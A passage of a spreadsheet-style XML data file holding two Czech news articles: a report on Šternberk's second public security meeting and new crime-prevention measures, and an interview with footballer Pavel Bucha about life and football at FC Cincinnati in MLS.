    <t>20241101_663_3239763513_92bfa1289841595c6b23.html</t>
  </si>
  <si>
    <t>92bfa1289841595c6b23</t>
  </si>
  <si>
    <t>Téma bezpečnosti ve Šternberku již podruhé zaplnilo kulturní dům a v úterý 15. října nastoupili do služby noví asistenti prevence kriminality</t>
  </si>
  <si>
    <t>Téma bezpečnosti ve Šternberku již podruhé zaplnilo kulturní dům a v úterý 15. října nastoupili do služby noví asistenti prevence kriminality Noví asistenti prevence kriminality, zřízení romské rady, nové oddělení hlídkové policie či krátká přednáška o ochraně oznamovatele protiprávního jednání – to byla jen některá témata již druhého veřejného setkání k otázkám bezpečnosti ve Šternberku . To se uskutečnilo 10. října 2024 ve velkém sále kulturního domu na Masarykově ulici a zúčastnila se jej zhruba stovka lidí. „Bezpečnost je sdílená odpovědnost, a proto v první řadě děkuji občanům za to, že si našli čas na druhé setkání k otázkám bezpečnosti a aktivně se zapojili do diskuse, kterou považuji za nesmírně důležitou,“ uvedl starosta Stanislav Orság . „Přestože se situace od prázdninových incidentů zdá být klidnější a platí, že napětí ve městě způsobuje stále jen malá skupina delikventů, nechceme cokoliv podcenit a plníme to, co jsme občanům slíbili,“ dodal. Městu se od posledního veřejného setkání podařilo mimo jiné rozšířit řady městských strážníků i asistentů prevence kriminality. Nově budou v terénu působit dva strážníci a tři asistenti prevence kriminality z řad romské komunity. Město si od jejich zapojení slibuje nejen zvýšený dohled nad veřejným pořádkem, ale i zlepšení komunikace mezi majoritní společností a romskou menšinou. K lepší komunikaci a klidnějšímu soužití by měla přispět i nově zřízená romská rada. „Bez dialogu nevyřešíme vůbec nic,“ říká k věci Libor Šamšula, šéf městské policie. „I v romské komunitě je řada občanů, kteří cítí strach a obavy, rádi by přispěli k vyšší bezpečnosti ve městě a zlepšení vztahů mezi majoritní společností a Romy. Právě s nimi chceme dlouhodobě spolupracovat,“ doplnil Šamšula. Kromě rychlých opatření vedení města a městské policie pracuje i na těch dlouhodobých – mezi ně patří například snaha spojovat se s dalšími městy a jednat o problematice násilí dětí a mladistvých na státní úrovni. Jednání se zástupci ministerstev, samospráv a vládní zmocněnkyní pro lidská práva je naplánováno již na 6. listopadu. Města na něm chtějí otevřít nejen problematiku prevence a represe, ale i legislativní otázky - např. snížení trestní odpovědnosti mladistvých. „Máme pocit, že spousta mladých delikventů se cítí naprosto beztrestně. To chceme změnit,“ vysvětluje starosta Šternberka Stanislav Orság . Veřejného setkání se za Policii České republiky zúčastnil i ředitel Územního odboru Olomouc Richard Jílek: „Vnímáme zjitřenou atmosféru ve Šternberku , ale mohu veřejnost ubezpečit, že statisticky se kriminalita ve Šternberku nevymyká jiným lokalitám. Bezpečnost je pro nás prioritou a velmi důsledně a pečlivě se věnujeme všem nahlášeným událostem.“ Jílek rovněž doplnil, že od 1. ledna 2025 vznikne v Olomouci nové oddělení, jehož policisté se budou věnovat bez zbytečné administrativní zátěže pouze hlídkové činnosti a kontrole veřejného pořádku. Zástupce policejního prezidia Dalibor Horský na závěr občany seznámil s možnostmi ochrany oznamovatelů protiprávního jednání, například s možností oznamovat anonymně. „Policie je tu proto, aby chránila nejen oběti, ale i svědky a oznamovatele trestné činnosti. Vím, že je někdy náročné sebrat odvahu a vytočit tísňovou linku, ale prosím všechny, ať jsou důslední a volají nám. Spolupráce veřejnosti s Policií ČR je základem bezpečné společnosti,“ říká Horský. Již druhé veřejné setkání bylo svoláno v důsledku nárůstu počtu incidentů během letního období, při nichž malá skupina pachatelů napadala a ohrožovala občany města, což vedlo ke snížení pocitu bezpečí ve městě. Vedení města proto ve spolupráci s Policií České republiky a dalšími partnery hledá řešení, jak tomuto problému čelit. Z diskuse s občany vzešla nejen řada dotazů, ale též konkrétních podnětů – například požadavek na zvýšený dohled u základních škol v době konce vyučování. Tomu vedení města vyšlo vstříc a již teď tak bude posílena hlídková činnost městské policie a asistentů prevence kriminality mezi 13. a 15. hodinou u šternberských základních škol. Doplňující informace Na setkání byla představena další konkrétní opatření, která město a jeho partneři již realizovali či je chystají: ● Posílení kamerového systému: Město plánuje do konce roku instalovat další tři kamery, které pomáhají monitorovat problémové oblasti. Za letošní rok tak přibude celkem 8 nových kamerových bodů. Systém bude dále rozšiřován dle potřeby. ● Byl rozšířen seznam míst se zákazem konzumace alkoholu : Město chce tímto reagovat na nadužívání alkoholu a drog, v jehož důsledku se zvyšuje agresivita na veřejných prostranstvích. Vyhláška s aktualizovaným seznamem míst byla schválena na zářijovém jednání zastupitelstva města. Na podnět občanů město navrhne subjektům podnikajícím na uvedených adresách, aby na své provozovny umístili upozornění o zákazu pití alkoholu . ● Spolupráce s dalšími městy a společný tlak na legislativní změny: Město se setkává s představiteli jiných samospráv a společně usiluje o vyvolání diskuse ohledně řešení problematiky násilí dětí a mladistvých a o možných úpravách legislativy, které by umožnily efektivnější řešení bezpečnostních problémů. Jednání se zástupci ministerstev je plánováno na 6. listopadu 2024. ● Město zřídilo tzv. romskou radu: Jedná se o poradní těleso, jehož hlavním cílem je zprostředkovat komunikaci mezi majoritní společností a romskou minoritou. ● Spolupráce s organizacemi sdružujícími menšiny: Město bude dále prohlubovat spolupráci s neziskovými organizacemi, která pomůže předcházet dalším případům a tlumit napětí. Tyto organizace budou působit dovnitř komunit. ● Odkup problémové nemovitosti: Zastupitelstvo města v prosinci projedná záměr města vykoupit jednu z problematických nemovitostí do svého vlastnictví. ● Nové jednání s majiteli dotčených nemovitostí. ● Policie České republiky zřizuje od 1. ledna 2025 nové oddělení, jehož hlavní náplní bude hlídková činnost. Nadále pokračuje v preventivních aktivitách, působí od mateřských škol až po domovy seniorů. ● Město bude pokračovat v dialogu s veřejností: Jednalo se o druhé setkání z řady plánovaných veřejných diskusí, které mají za cíl hledat společná řešení aktuálních bezpečnostních problémů. Vedení města chce i nadále zapojovat veřejnost a naslouchat jejím názorům, potřebám a otázkám. Autor: (red)</t>
  </si>
  <si>
    <t>3000</t>
  </si>
  <si>
    <t>20241101_664_3239759944_7ae784eca0b305bc486d.html</t>
  </si>
  <si>
    <t>7ae784eca0b305bc486d</t>
  </si>
  <si>
    <t>MLS NENÍ JEN O MESSIM</t>
  </si>
  <si>
    <t>MLS NENÍ JEN O MESSIM Rubrika: R O ZH O VO R Vyrůstal v akademii pražské Slavie , za Viktorii Plzeň si zahrál Ligu mistrů, ale pak nadějný fotbalový záložník zmizel z Čech i z Evropy . Pavel Bucha se letos v lednu rozhodl v pětadvaceti dobýt Ameriku . V barvách FC Cincinnati se mu to zatím daří. Lionel Messi se na něj díval z první řady. Ve třistatisícovém městě na jihozápadě státu Ohio pobývá od února. A na vlastní kůži objevuje Ameriku . „Na některé věci jsem docela koukal,“ přiznává střední záložník Pavel Bucha . Už jste se v Cincinnati zabydlel? „Jo. Už nějakou dobu jsme tu zabydlení a cítíme se jako doma.“ Co bylo nejtěžší při stěhování? „Vízum, shánění domu, auta a podobné věci mi ani tolik starostí nedělalo. Pomáhali mi s tím hodně v klubu. Nejdůležitější pro mě bylo, abych tady měl co nejdřív rodinu a psa. Domov pro mě znamená, že mám u sebe lidi, které miluju. A to se povedlo celkem rychle. Asi po měsíci, co jsem tu byl, za mnou přicestovali. Od té doby je pro mě všechno mnohem jednodušší.“ Pro vízum jste si však musel do Kanady , pokud mám dobré informace. „Jo, ale zvládlo se to. Nejdřív jsem přicestoval na ESTA vízum, které si jde udělat rychle po internetu. Pak se muselo vyřizovat pracovní povolení, respektive vízum, které mi umožňuje, abych tady mohl dál působit. To se začalo řešit hned na soustředění na Floridě . Po třech týdnech mi oznámili, že všechny papíry jsou připravené a že jediné, co musím, je vycestovat pro ně na českou ambasádu. Bylo to trošku komplikované, protože nejblíž byla ambasáda v Ottawě . A tak jsme vyrazili s manažerem týmu z Tampy do Ottawy . Jeden den jsme přijeli, strávili jsme noc na hotelu, druhý den ráno jsme zašli na ambasádu, všechny dokumenty jsem si vyzvedl a mohli jsme zase nasedat na letadlo a vrátit se zpátky za mužstvem.“ Aspoň už víte, jak vypadá česká ambasáda v Ottawě . „Jediné, co bylo trošku nepříjemné, že z Floridy , kde se teplota pohybovala v lednu mezi pětadvaceti až třiceti stupni, jsme přeletěli do Ottawy , kde bylo pod nulou. Manažer na to nebyl úplně nachystaný. Na Floridu si zabalil jen plavky, tričko a tílka. Jenže najednou se mnou letěl do Ottawy . Tam si musel na letišti kupovat zimní bundu, protože jinak by asi umrzl. Měli jsme sice na určitý čas domluvené vyzvednutí víza, ale už v sedm hodin ráno byla před ambasádou zhruba stometrová fronta lidí, kteří šli žádat o víza nebo o prodloužení. A mohlo být tak minus pět stupňů.“ Nepředběhli jste jako V. I. P. hosté? „Ne, počkali jsme jako všichni ostatní. Stáli jsme asi tři čtvrtě hodiny před budovou, než nás pustili dovnitř. Pak už naši žádost vzali přednostně, podívali se na ni a schválili ji během pár hodin, aby nám umožnili chytit co nejdřív letadlo nazpátek. Litoval jsem našeho manažera, protože venku ve frontě docela trpěl. Říkal jsem mu, ať se zajde schovat do kavárny nebo zpátky na hotel, že to určitě zvládnu sám, ale on opakoval: Nemůžu, jsem zvyklý hráčům naservírovat všechno až před nos. Tak tam chudák se mnou stál až do poslední chvíle.“ Mnoho mladých lidí v Česku má sen jednou studovat nebo pracovat ve Spojených státech . Jak tomu bylo u vás? „My jsme měli s manželkou taky takový společný sen. Říkali jsme si, že až budu mít po kariéře, uděláme cestu po Americe , třeba na tři měsíce. Už jsme na to dokonce šetřili. No a pak najednou přišla minulý rok nabídka a my si to už tak trošku plníme teď. Když je čas, poznáváme tady různá místa. Je to fajn a ty peníze využijeme potom na něco jiného. Třeba na Norsko .“ Takže když přistálo laso z Cincinnati , ani na okamžik jste neváhal? „To zas ne. Moje původní reakce byla: Uvidíme. Přiznám se, že jsem neměl jasné představy, Cincinnati mi víceméně nic neříkalo. Jediné, s čím jsem si tohle město spojil, byl tenisový turnaj, který se tam každým rokem koná. Vůbec jsem ani netušil, že Cincinnati hraje americkou Major League Soccer . I když jsem MLS po Messiho příchodu po očku sledoval. Ale že bych zvlášť studoval týmy a znal všechna města, ve kterých se soutěž hraje, to ne. Takže první nastavení v hlavě bylo spíše opatrné až defenzivní. Že přece ze dne na den nepřestěhuju na druhou stranu světa sebe a svoji rodinu. Ale pak jsem se dozvídal víc a víc informací, měl jsem možnost mluvit s lidmi z klubu, řešil jsem spoustu konkrétních věcí a možností se svými agenty ze SPORT INVESTu a myšlenka přesunu do USA se mi začala líbit. Diskutoval jsem to s rodinou a nakonec jsme se rozhodli, že nám stěhování do velké dálky za to stojí.“ Neříkal jste si při uvažování ano či ne, jestli je MLS pro váš fotbalový rozvoj dostatečná? Co si budeme namlouvat, z Česka do Ameriky chodí sportovci spíš za hokejem nebo basketbalem. „Chápu. Ale já jsem měl zprávy, že úroveň soutěže jde nahoru a byl mi nastíněn projekt, jakým směrem se Cincinnati ubírá. Nemyslel jsem si, že bych šel někam o úroveň níž, že MLS je horší než česká liga. Šel jsem do Ameriky s tím, že to bude pro moji kariéru zajímavý refresh, že si otevřu nové dveře a ukážu se jinde ve světě. Viděl jsem za tím další příležitosti, které z toho můžou v budoucnu vzejít.“ Jakým projektem vás zástupci klubu přesvědčili? „Měl jsem s nimi tři schůzky. Nejdřív s člověkem ze skautingu, potom s generálním manažerem, pak s trenérem. Bavili jsme se o tom, jak klub funguje a jaký fotbal chce hrát. Přišlo mi, že o mě hodně stojí. Měli mě nastudovaného a načteného, věděli přesně, co ode mě čekat a že budu pro tým platný. Líbilo se mi, jak trenér o fotbale přemýšlel. Celkově ze všech bylo cítit, jak jsou ambiciózní a plní energie. Že chtějí něco dokázat.“ Vyhrát ligu? „Ambice jsou na tuhle sezonu nejvyšší. Už ta minulá se Cincinnati dost povedla, vyhráli základní část. Pak přišlo velké zklamání v play off, ale pro ně to spíš bylo povzbuzení a další motivace. Což je obecně americká mentalita. Viděli, že tým furt stoupá nahoru. Do letošního play off jdeme s tím, že chceme být úspěšnější než loni, a klub věří, že má hráče na to, aby celou soutěž mohl vyhrát.“ Z čeho vám zatím v Americe spadla brada? „Z ničeho. Představa, jakou jsem měl, se přibližně naplnila. Překvapily mě jen maličkosti a rozdílnosti mezi kulturami.“ Například? „Jedna z prvních věcí, která mě po příjezdu na soustředění překvapila, se týkala kávy. Američani jsou do ní naprosto pobláznění. Přitom to ani káva není. Osobně kávu tolik nepiju, určitě nejsem žádný znalec, ale to, co oni pijí, nemá s kávou krom názvu a barvy mnoho společného. Přesto jsou schopni vypít denně litr, někteří litr a půl kávy. Dávají si ji do velkých kelímků a mají to přeplněné ledem. To je další maličkost, která mě zarazila.“ Že milují led? „Oni do veškerého pití cpou led! Když si dáte nápoj v restauraci, naplní vám celou skleničku ledem a samotná tekutina už se tam pomalu ani nevejde. Nebo jsem hotový z klimatizace. Tady má každá domácnost klimatizaci, což v Čechách není zvykem. Nebo aspoň my jsme ji u nás doma neměli. U Američanů je to normálka. Když jsme se jednou v kabině s kluky zkraje léta, kdy začínala velká vedra a na sluníčku bylo ke čtyřiceti stupňům, bavili, říkali, že klimatizace jim doma jde v režimu 24/7 a mají ji nastavenou na 18 stupňů. A že jsou prostě zvyklí pořád chodit v teplácích a mikině, i když jsou venku takováhle vedra. Já jsem jim říkal, že u nás klimatizaci zapínáme jednou za čas, když už fakt cítíme, že je toho horka moc. Že si ji navečer jenom tak na chviličku pustíme, aby nám bylo příjemně na spaní. A že máme doma třeba 25 stupňů. Oni se úplně zhrozili. Říkali, že kdyby v tomhle byly jejich děti, brečí a dostávají panické záchvaty. Vůbec si nedovedli představit v tom žít. Anebo recyklace…“ Copak? Nelámou si s ní hlavu? „My jsme byli zvyklí, že v Čechách máme normálně samostatné kontejnery na plast, na papír, na sklo. Tady to vůbec neřeší. Sklo, plast, papír, všechno dávají do jedné popelnice. Oni prostě s ničím nešetří. Když jdete do obchodu s potravinami, u pokladny u pásu stojí ještě člověk navíc, který vám přijíždějící potraviny balí do igelitek a dává vám to do košíku. Každý kousek, třeba i pečiva, zabalí do jedné igelitky, takže vy si pak nesete domů 50, 60 igelitek. V Čechách jsem si naplnil v supermarketu 4, 5 igelitek a donesl si nákup domů. Teď máme doma stovky nepotřebných igelitek. To samé se děje s ubrousky v restauracích. Tyhle rozdíly člověka z Evropy cvrnknou do nosu. Američani jsou v tomhle hrozně neekologický.“ Na kolik máte nastavenou teplotu v kabině? „Naštěstí, protože tam je víc kultur, je v šatně většinou alespoň kolem 20 stupňů, což je i tak na mě málo. Když tam přijdu, okamžitě mám husí kůži a musím se obléknout. Oni se v tom naopak cítí nádherně. Kvůli tomu jsem měl problém už na soustředění. Normálně na zápasy máme pokoje po jednom, ale na soustředění, protože jsme byli na Floridě přes měsíc, jsme byli na pokojích po dvou. Mě přiřadili k mladému Američanovi , takže tam bylo šíleně – jen 18 stupňů, někdy třeba i 17 nebo 17,5. Furt jsem si na mobilu přepočítával, jestli jsem se nespletl, protože teplota byla ve Fahrenheitech. Pořád jsem si to převáděl na stupně Celsia, ale sedělo to. Na pokoji bylo fakt nechutně. Abych se vyspal, bral jsem si od kustodů termo triko, termo legíny a balil jsem se do mikiny. Taky nesnáším, když máte uvnitř sedmnáct a pak jdete trénovat ven, kde je osmadvacet. Cítím se hrozně. Až po pár dnech jsme si to vykomunikovali a nastavili jsme kompromis - 21 stupňů. Ale před zápasy mám na pokoji pětadvacet. Když ke mně přijdou mladší Američani na pokec, po pěti minutách odcházejí. Naopak když já k nim na pokec, mají tam sedmnáct, jsou happy, já odcházím, abych nezmrznul.“ Nakoukněme teď hlouběji do klubového zázemí. Narazíme v tréninkovém centru na high technologie? „Tréninkové centrum je, dá se říct, ještě fungl nové a opravdu krásné. Jsou tam dvě travnatá hřiště, jedna umělka. Trávníky jsou naprosto super. Stará se o ně spousta lidí. Kromě kabiny pro hráče je v areálu velká jídelna, kde máme snídaně a obědy. Dále velká video místnost pro týmové nebo individuální videoanalýzy. Velká je i místnost pro fyzioterapeuty a masérna spojená s regenerací, kde se nachází vířivka, sauna a bazének se studenou vodou. Pak je tu velká posilovna, ve které člověk nalezne všechno, na co si vzpomene. Alek když to porovnám s Plzní , vybavení se neliší. Tam i tady je na vysoké úrovni.“ Příprava je odlišná? „Tady je všechno postavené na třech základních pilířích – spánek, jídlo a pitný režim. Tyhle oblasti s námi řeší do detailů a snaží se je mít co nejlepší. Věří, že díky tomu můžeme podávat nejlepší výkony. Máme aplikaci, kterou každý hráč musí každý den po příchodu do kabiny vyplnit. Musí zaznamenat, jak se vyspal, kolik hodin spal, jak se cítí, jak má unavené svaly, jak se těší na trénink, jakou má náladu a tak dále. Máme každý svůj profil, kde se tyto informace dennodenně zaznamenávají. Specialisté to kontrolují, a když zjistí jakýkoli problém, hned se to řeší. Pak hlídají, abychom měli kvalitní snídaně. V rámci švédských stolů máme všechno, na co si vzpomeneme. A když má někdo speciální požadavky, jsou mu k dispozici kuchaři, kteří mu uvaří, co potřebuje. Jednou za tři měsíce za námi přijde do kabiny doktor, který všem odebere krev, aby zjistil, co komu chybí nebo nechybí v těle.“ Co snídáte? „Já se držím toho, na co jsem zvyklý. Ale také to střídám, abych každý den neměl úplně stejné jídlo. Většinou si nechám udělat omeletu se sýrem a šunkou. K tomu si dám toast a avokádo. Navrch lesní ovoce - maliny, ostružiny, borůvky. Tohle je taková moje klasika. Občas si dám i ovesné vločky s ovocem, nějakou zeleninu nebo třeba jogurt.“ A oběd? „Většinou jsou na výběr batáty, tedy sladké brambory, normální brambory, rýže, těstoviny. Pak tři druhy mas. Hodně se tady jí hovězí, samozřejmě i kuřecí a krůtí maso. Vepřové máme málokdy, třeba jen jednou za týden. Pak si vždycky naložím ještě zeleninu a ovoce. Taky nám každý den dělají dva druhy freshů. Vymačkají šťávu z červené řepy, řapíkatého celeru, mrkve, pomerančů a dalších různých druhů ovoce a zeleniny.“ To už jsme se volně přesunuli k pitnému režimu. „Na něm si fakt dost zakládají. Všude po toaletách v tréninkovém centru jsou rozmístěné malé krabičky, do kterých máme načůrat, protože tyhle krabičky nám okamžitě změří, jak moc jsme hydratovaní. Buď se rozsvítí zeleně, žlutě nebo červeně. Když jste zelený, jste v pohodě. Když jste žlutý, máte vypít hned třeba třetinku vody. A když jste červený, musíte se zavodnit hodně.“ Musel jste začít víc pít? „Ne, já jsem byl zvyklý hodně pít už z domova. Ale někteří Američani z týmu s tím mají problém, protože vodu moc nepijí. Když vstanou, první, co si udělají, je kafe. A do tréninku ji pijí jen z litrového kelímku, čímž tělo moc nehydratují. Takže pak dostávají hydratační tabletky, které jim dávají do vody, aby tělo tekutinu rychleji vstřebalo.“ Upravil jste něco ve spánkovém režimu? „Navázal jsem na to, jak jsem to měl zaběhlé z Čech . Se spánkem jsem nikdy problémy neměl. Ale jsou tu kluci, kteří se v noci budí nebo vstávají už v pět hodin, protože nemůžou dospat. Řeší se to s nimi individuálně. Nasazují jim magnézium, aby jim pomohli. Já jsem se o spánkovou hygienu už dříve sám zajímal a večer mám svoje rutiny, které dodržuju. Chodím spát okolo desáté hodiny a vstávám kolem osmé. Kvalitního spánku mám dostatek.“ Intenzita tréninku je podobná jako v Česku? „Když jsem naskočil v Cincinnati do přípravy, už jsem měl z Plzně tři týdny tréninku za sebou. A hned jsem poznal výrazný rozdíl v objemu. V Čechách jsem byl zvyklý během letní přípravy trénovat dvakrát denně. Tady to tak vůbec nebylo. Na soustředění byla spousta volného času. Protože se trénovalo jen jednou denně a na hřišti. A trénink trval maximálně hodinu a půl. Nikdy nebyl delší. Spíš kratší. Všechno bylo intenzivní a s balonem. Tím, jak jsem byl zvyklý na něco jiného, cítil jsem se zpočátku….“ Nedostatečně vytížený? „Říkal jsem si: Jak budu připravený do zápasu, když tu trénujeme jednou denně a pak ležíme na pokojích nebo si děláme, co chceme?“ V sezoně to pokračuje ve stejném rytmu? „Je to taky oproti Čechám specifické. Když hrajeme jednou za týden o víkendu, náš trenérský štáb má rád čtyřdenní tréninkový cyklus před utkáním. Takže když hrajeme v sobotu, máme v neděli a v pondělí volno, tedy dva dny, což jsem u nás zažil jen při reprezentační pauze. Tady to máme pravidelně. V úterý, ve středu, ve čtvrtek a v pátek jsou tréninky a v sobotu je znova zápas. Volna je dost, na což se dobře zvyká a zamlouvá se mi to. V Čechách jsme dostávali jeden den volna za týden a někdy ani to ne. Pouze přes repre pauzu byl třeba volný víkend.“ Jaký mají trenéři přístup k hráčům? Je to taky volnější? „To je možná jedna z věcí, která mě na začátku nejvíc překvapila. Ne že by mi z toho spadla brada, ale překvapila. Na soustředění jsme po snídani odjeli na trénink, po něm následoval oběd, který končil v jednu odpoledne. Pak jsem byl z Čech zvyklý, že buď trénujeme znova, anebo že máme striktně daný jiný program – odpočinek na hotelu, pak regenerace, potom video. Tady? Všichni mají volný program. Můžete přijít večer na společnou večeři, ale nemusíte. Můžete si sami zajít do města na večeři. Snídaně vlastně také nebyly povinné, takže jediné, co po nás chtěli, abychom byli při odjezdu na další trénink. Na tohle jsem udiveně koukal. Byl pro mě velký nezvyk, že mi nikdo neříká, co mám dělat, ale každý si mohl dělat, co chtěl.“ Kdežto pro Američany to byla normálka. „Někteří kluci si zašli na pohodu do města, jiní si dali posilovnu, další se věnovali regeneraci. Tak je tomu i během sezony. Trenéři nebo různí poradci a specialisté jsou spíš v pozadí. Jsou nám k dispozici, když za nimi sami přijdeme a chceme s něčím poradit, anebo chceme trénink navíc. Není tu nic povinného, striktního. Všechno je to individuální a dobrovolné. Do posilovny chodí pět, šest, sedm hráčů, zbytek má po tréninku padla. Jdou si sednout do vířivky a pak jedou domů.“ Lidí kolem týmu je asi hodně, jak vás tak poslouchám. „Spousta. (usmívá se) Na soustředění odjelo 24 hráčů do pole a 4 gólmani. Realizačního týmu bylo dvakrát tolik. To bylo šílené.“ Prostě specialisté na všechno. „Hlavní trenér, tři asistenti, trenér gólmanů, tři videoanalytici - jeden stříhá videa, druhý provozuje dron, třetí jim pomáhá. Pak jsou k dispozici tři manažeři týmu, kteří řeší program a jsou k dispozici hráčům s čímkoli pomoct. Fyzioterapeutů je asi pět, maséři tři, dva kondiční trenéři, mentální kouč, výkonnostní kouč, doktoři… Těch lidí je u týmu fakt spousta.“ Jakým způsobem je vyvíjen tlak na hráče a na výsledky? „Z pohledu, na co jsem byl zvyklý z Čech , tady tlak skoro vůbec není. Přemýšlím, jak bych to přesně popsal… Třeba v Plzni byly jasné ambice: držet se na špici, konkurovat Slavii a Spartě , nejlépe být ještě před nimi. Každý rok minimálně nějaká evropská soutěž. Když přišlo pár zaváhání, bylo hned dusno a z vedení jste cítil, že by se mělo trošku zamakat. Tady to tak není. Nedávno jsme měli sérii tří proher v řadě, předtím jsme také dvakrát prohráli a nikdo se tu nehroutil. Není to tu samozřejmě furt sluníčkové, že by bylo každému jedno, když se prohrává, to určitě ne. Taky se to v kabině řeší a je tam trošku dusno. Ale není to v takové míře jako v Čechách . Trenéři jsou upřímní a kritičtí, řeknou, že jste hrál špatně, anebo že tým podal jeden z nejhorších výkonů, ale pak dodají, že život jde dál a že fotbal není všechno. Možná je to i tím, jak je to v MLS postavené.“ Co tím myslíte? „Mám pocit, že tady se o tolik nehraje. V Čechách se hraje o titul, o peníze, o postup do evropských pohárů, o sestup nebo baráž. Tady sestup ani baráž nejsou. Jediný cíl, který pro mužstva existuje, je dostat se do play off. A pak tu je pár ambiciózních týmů, které chtějí vyhrávat a získávat trofeje. Možná je to i tím, že každý klub vlastní miliardáři, kteří je mají pro zábavu. Všechno je víc na pohodu.“ Měl jste už možnost poznat finančníka Carla Lindnera, majitele Cincinnati , jehož jmění přesahuje dvě miliardy dolarů? „Měl. Čekal bych, že takový člověk o nás nebude moc jevit zájem, ale celkem často za námi zavítá. Je vidět, že má lásku k fotbalu. Takže ho občas můžeme vidět na tréninku. Jen tak si sedne a kouká, jak trénujeme. Je na všech zápasech a někdy nám přijde i po utkání do kabiny podat ruku. I na soustředění s námi pár dní byl. Náš majitel s námi docela žije, nesnaží se být odtažitý.“ Nejambicióznějším klubem v MLS teď asi musí být Inter Miami s Lionelem Messim a dalšími superhvězdami z Evropy . „Je to z nich cítit. Nesouhlasím s tím, že by se světové hvězdy šly do Miami jen na důchod vyprdět pro zábavu. Jako fotbalista furt máte v sobě ambice a soutěživost. Poznal jsem to na nich, když jsem proti nim hrál. Pořád mají v sobě zápal a chtějí vítězit. Na hřišti udělají pro výhru první a poslední.“ S Miami jste prohráli 0:2, když se o oba góly postaral Luis Suárez . „Hráli jsme s nimi letos už dva zápasy. V prvním jsme je doma porazili 6:1. To byl asi náš nejpovedenější výkon a jejich nejhorší. Seběhlo se tam všechno v náš prospěch a v jejich neprospěch.“ Ale Messi nehrál, je to tak? „Nehrál. Nehrál ani Suárez . Oba byli na turnaji Copa América. Jordi Alba byl vykartovaný, takže jediný, kdo z hvězd nastoupil, byl Sergio Busquets . V druhém zápase u nich už hráli Alba i Suárez , Messi si ještě, bohužel, léčil zranění z Copy. Na začátku jsme dostali dva góly od Suáreze a vlastně bylo po zápase. Proti takovým hráčům se dvoubrankové manko dohání těžko. I když oni v první půli dostali červenou a vypadalo to pro nás nadějně. Jenže jsme byli mimo rytmus a ani ve druhé půli jsme je neohrozili, i když jsme měli přesilovku.“ Kdo na vás z těch tří es udělal na trávníku největší dojem? „Určitě Busquets . Jsem fanoušek Barcelony a sledoval jsem její éru s Messim , Busquetsem . Všechny hráče jsem tehdy miloval. Ale z Busquetse jsem byl teď nejvíc odvázaný. Hrají míče do něj, on skoro neudělá rychlejší pohyb, přesto si poradí s veškerým tlakem od soupeřů. Přijde mi, že slovo tlak pro něj neexistuje. Vždycky se z jakéhokoli tlaku dokáže, téměř v chůzi, vymanit. Naším plánem bylo dostávat hráče Miami pod tlak a presovat, ale s Busquetsem se to dělalo těžko. Když ho dostali na míč, jednou přihrávkou nás vyřadil šest. Jordi Alba si z pozice krajního obránce odskočil do středu a on mu to tam lobíčkem překopl. Běhali dost bez balonu, na čemž měl Busquets velkou zásluhu. Je hrozně klidný na míči, vždycky najde dobré řešení a nikdy ho nedostanete pod takový tlak, že by udělal chybu.“ A Suárez ? „Ověřil jsem si, že furt v sobě má toho hajzlíka na hřišti. Pošťuchoval se s našimi hráči, hádal se s rozhodčím, simuloval. Využil prostě všechny možné zbraně, aby vyhrál. Na hřišti je velice chytrý a vyčůraný.“ V Evropě máme pocit, že MLS je nyní jen o Messim . Vypadá tak i realita? „Chápu, že pro lidi, co nejsou tady a nepohybují se blíž MLS, je to čistě jen o Messim . I tady se nejvíc v souvislosti se soccerem řeší Miami a Messi . Ale když zapnete televizi, na sportovních kanálech běží z 95 procent americký fotbal. Pak se zmíní trošku o hokeji a až potom následuje zmínka o socceru. A když to udělají, je to zpráva o tom, jak si vedou Messi a Miami . Sociální sítě? Totéž. Když se na nich cokoli zmíní o MLS, vždycky je to ve spojení s Messim a Miami . Ale když jsem poznal hráče a kluby MLS, vím, že to jen o Messim není. Je tu spousta šikovných mladých hráčů, kteří podle mě v blízké budoucnosti odejdou do velkých evropských klubů.“ Všechno, co je v Americe , musí být show. Platí to asi i pro soccer? „Ano. Dělají tu zápasy jen čistě pro diváka. My, hráči, jsme pouze taková kulisa, na kterou se devadesát minut dívají. Nebo se jen po očku dívají. Anebo ani to ne, jen si přijdou na stadion sednout, něco sníst a bavit se. Pro lidi je připravený program už před zápasem. Během rozcvičky se je snaží zabavit DJ. Každé utkání začíná ohňostrojem a hymnou. Cítíte z toho, že to je víc než fotbal.“ Rozumí už Američané fotbalu? Jsou schopní ocenit třeba pěknou kombinační akci? „Většina lidí, co chodí na naše domácí zápasy, už ano. Na stadionu je dobrá atmosféra. Když se blížíte k bráně nebo ke střele, publikum zpozorní a nastane větší řev. Dokážou ocenit, když se na trávníku stane nějaká nadstandardní věc, třeba klička. Zareagují na to potleskem nebo užaslým výrazem. Je to už dost podobné, co jsem zažil v Evropě .“ Jak je to v zámoří s popularitou fotbalistů? „Stává se mi běžně, že mě lidi poznávají. Ale samozřejmě pro lidi je tady nejvíc americký fotbal, takže jsou u vytržení, když vidí na ulici amerického fotbalistu. Jenže málokdy se stane, že ho vidí, protože hráči amerického fotbalu jsou si vědomi, že by je lidi umačkali. A tak je na veřejnosti jen tak nepotkáte. My to máme jednodušší. Lidi se nás usmějí, popřejou hodně štěstí. A pak nás nechají být. Nechtějí ani fotku nebo podpis. Jsem zvyklý chodit s rodinou ven a tady mi to je umožněno, takže jsem spokojený.“ Co už jste poznal z okolí Cincinnati ? „Kdykoli máme prostor, vždycky někam vyrazíme. Byli jsme na pár dní v Chicagu , v Columbusu , v Indianapolisu . Také nás mezi sebe přijala menší česká komunita, která nás občas vezme do oblastí, o kterých bychom na první dobrou nevěděli. Třeba jsme vycestovali do přírody za Cincinnati .“ Co z toho vás nejvíc zaujalo? „Každé město mělo něco do sebe. Největší dojem na mě udělalo asi Chicago , nádherné velkoměsto. Má spoustu mrakodrapů, ale i zeleně a parků. Do toho Michiganské jezero s plážemi. Byli jsme tam v létě, tak jsme se i koupali. Lidi podél jezdí na kole a běhají. Hezky to tam na mě dýchlo.“ Čím je zajímavé Cincinnati ? „Nejzajímavější část je OTR, Over- -The-Rhine. Původně ji obydlovali Němci a přetrvalo to tam dodnes. Je plná restaurací, obchodů, nachází se tu i jeden zachovalý velký pivovar, kde čepují spoustu druhů piv , které si sami vaří. Můžete jít na prohlídku do sklepení a podzemí, které využívali pro skladování piva .“ Takže tak trochu česká Plzeň. Vědí vůbec tamní obyvatelé, kde leží? A tuší to spoluhráči? „O tom jsme se v kabině ani nebavili. Ale zhruba vědí, kde je Česká republika , a někdo byl i v Praze .“ „V ČECHÁCH SE HRAJE O TITUL, O PENÍZE, O POSTUP DO EVROPSKÝCH POHÁRŮ, O SESTUP NEBO BARÁŽ. TADY 